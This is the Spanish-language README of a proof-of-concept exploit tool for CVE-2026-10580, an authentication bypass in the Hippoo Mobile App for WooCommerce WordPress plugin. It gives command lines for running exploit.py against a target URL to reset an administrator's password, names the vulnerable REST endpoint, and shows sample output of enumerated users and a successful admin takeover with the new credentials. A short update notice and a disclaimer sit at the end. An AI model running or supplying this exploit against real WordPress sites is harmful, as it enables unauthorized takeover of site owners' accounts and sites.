
Exploit PoC para CVE-2026-10580 - Bypass de autenticación en la aplicación móvil Hippoo para WooCommerce <= 1.9.4 que conduce a la toma de control de la cuenta de administrador
Esta herramienta es un exploit de prueba de concepto para CVE-2026-10580, una vulnerabilidad de bypass de autenticación que afecta al plugin de WordPress Hippoo Mobile App for WooCommerce (versiones <= 1.9.4). La vulnerabilidad permite a atacantes no autenticados restablecer la contraseña de cualquier usuario, incluidos los administradores, lo que lleva a una toma de control completa del sitio.
⚠️ Importante: Esta herramienta es únicamente para pruebas de seguridad autorizadas y fines educativos. El uso no autorizado contra sistemas que no poseas o para los que no tengas permiso explícito para probar es ilegal.
requestsInstala las dependencias:
pip install requests
python3 exploit.py -t https://target-site.com -p NewPassword123!
Explotación con ID de administrador predeterminado (1) y verificación SSL:
python3 exploit.py -t https://example.com -p PwnedCVE2026!!
Apuntar a un ID de usuario específico y deshabilitar verificación SSL:
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k
Ejecutar sin el banner:
python3 exploit.py -t https://example.com -p NewPass123 --no-banner
[+] Found 3 user(s)
- User ID: 1 | Username: admin | Role: administrator
- User ID: 2 | Username: editor_user | Role: editor
- User ID: 3 | Username: subscriber1 | Role: subscriber
╔══════════════════════════════════════════════════════════════╗
║ ADMIN TAKEOVER SUCCESSFUL ║
╚══════════════════════════════════════════════════════════════╝
Target: https://example.com
Login: https://example.com/wp-admin
Username: admin
Password: PwnedCVE2026!!
Si estás utilizando el plugin Hippoo, actualízalo inmediatamente a una versión parcheada (>1.9.4). Además:
/wp-json/wc-hippoo/v1/ext/wp/v2/usersEste proyecto está licenciado bajo la Licencia MIT. Consulta el archivo LICENSE para más detalles.
0xgh057r3c0n
El autor no se hace responsable por el mal uso de esta herramienta. Úsala de manera responsable y solo en sistemas que poseas o para los que tengas permiso explícito para probar.
| Argumento | Descripción |
|---|
-t, --target | URL del sitio WordPress objetivo (ej., https://example.com) |
-p, --password | Nueva contraseña a establecer para la cuenta de administrador |
-i, --id | ID de usuario para tomar el control (por defecto: 1) |
-k, --insecure | Omitir verificación de certificado SSL |
--no-banner | Suprimir el banner ASCII |